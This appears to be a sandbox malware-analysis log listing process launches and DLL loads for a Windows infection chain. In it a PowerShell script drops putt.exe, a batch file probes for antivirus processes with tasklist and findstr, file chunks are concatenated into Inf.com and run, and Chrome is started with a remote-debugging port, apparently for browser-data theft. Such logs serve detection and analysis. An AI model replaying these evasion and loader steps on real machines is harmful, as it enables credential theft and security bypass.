Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\script.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe"
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2204,i,11129156234363170229,15711613053576599617,262144 /prefetch:8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\putt.exe "C:\Users\user\AppData\Local\Temp\putt.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Cohen Cohen.cmd & Cohen.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 105235	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Authorization	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aid" Division	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 105235\Inf.com + Proceedings + Recovery + Webster + Sunglasses + Cultural + Tulsa + Being + Name + Silicon + Subtle 105235\Inf.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Glad + ..\Norway + ..\Tired m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com Inf.com m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 --field-trial-handle=2204,i,11129156234363170229,15711613053576599617,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
